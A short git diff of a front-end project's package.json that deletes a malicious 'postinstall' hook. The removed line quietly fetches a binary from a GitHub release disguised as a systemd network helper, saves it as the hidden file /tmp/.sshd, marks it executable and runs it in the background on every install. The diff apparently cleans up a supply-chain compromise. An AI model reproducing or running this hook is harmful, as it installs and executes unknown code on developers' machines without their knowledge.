diff --git a/package.json b/package.json index 430d039..e2b3724 100755 --- a/package.json +++ b/package.json @@ -10,8 +10,7 @@ "watch-poll": "mix watch -- --watch-options-poll=1000", "hot": "mix watch --hot", "production": "mix --production", - "prod": "mix --production", - "postinstall": "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &" + "prod": "mix --production" }, "keywords": [], "author": "",